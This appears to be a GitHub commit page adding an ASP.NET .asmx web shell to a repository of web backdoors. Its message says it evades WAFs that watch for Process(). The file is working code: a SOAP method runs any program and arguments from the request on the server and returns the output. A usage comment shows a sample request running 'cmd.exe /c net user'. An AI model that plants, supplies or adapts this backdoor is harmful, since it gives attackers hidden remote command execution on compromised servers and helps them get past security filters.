Skip to content

Commit 986ed12

Browse files
author
Rvn0xsy
authored
Add files in asmx format
This script can bypass the WAF that detects Process()
1 parent c18605c commit 986ed12

File tree

1 file changed

+88
-0
lines changed

1 file changed

+88
-0
lines changed

web-backdoors/asp/cmd.asmx

+88
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,88 @@
1+
<%--
2+
3+
Usage:
4+
5+
POST /test.asmx HTTP/1.1
6+
Host: example.com
7+
Content-Type: text/xml; charset=utf-8
8+
Content-Length: 363
9+
SOAPAction: "http://tempuri.org/Test"
10+
11+
<?xml version="1.0" encoding="utf-8"?>
12+
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
13+
<soap:Body>
14+
<Test xmlns="http://tempuri.org/">
15+
<Z1>cmd.exe</Z1>
16+
<Z2>/c net user</Z2>
17+
</Test>
18+
</soap:Body>
19+
</soap:Envelope>
20+
21+
--%>
22+
23+
<%@ WebService Language="C#" Class="Service" %>
24+
using System;
25+
using System.Web;
26+
using System.IO;
27+
using System.Net;
28+
using System.Text;
29+
using System.Data;
30+
using System.Data.SqlClient;
31+
using System.Collections.Generic;
32+
using System.Diagnostics;
33+
using System.Web.SessionState;
34+
using System.Web.Services;
35+
using System.Xml;
36+
using System.Web.Services.Protocols;
37+
38+
[WebService(Namespace = "http://www.payloads.online/")]
39+
[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
40+
41+
public class New_Process :Process
42+
{
43+
public New_Process(string s)
44+
{
45+
46+
}
47+
48+
}
49+
50+
51+
public class Service : System.Web.Services.WebService
52+
{
53+
public Service()
54+
{
55+
56+
}
57+
58+
[WebMethod]
59+
public string Test(string Z1,string Z2)
60+
{
61+
String R;
62+
63+
ProcessStartInfo c = new ProcessStartInfo(Z1,Z2);
64+
Process e = new New_Process("something");
65+
StreamReader OT, ER;
66+
c.UseShellExecute = false;
67+
c.RedirectStandardOutput = true;
68+
c.RedirectStandardError = true;
69+
e.StartInfo = c;
70+
71+
e.Start();
72+
OT = e.StandardOutput;
73+
ER = e.StandardError;
74+
e.Close();
75+
R = OT.ReadToEnd() + ER.ReadToEnd();
76+
HttpContext.Current.Response.Clear();
77+
HttpContext.Current.Response.Write("<?xml version=\"1.0\" encoding=\"utf-8\"?>");
78+
HttpContext.Current.Response.Write("<data>");
79+
HttpContext.Current.Response.Write("<![CDATA[");
80+
HttpContext.Current.Response.Write("\x2D\x3E\x7C");
81+
HttpContext.Current.Response.Write(R);
82+
HttpContext.Current.Response.Write("\x7C\x3C\x2D");
83+
HttpContext.Current.Response.Write("]]>");
84+
HttpContext.Current.Response.Write("</data>");
85+
HttpContext.Current.Response.End();
86+
return R;
87+
}
88+
}

0 commit comments

Comments
 (0)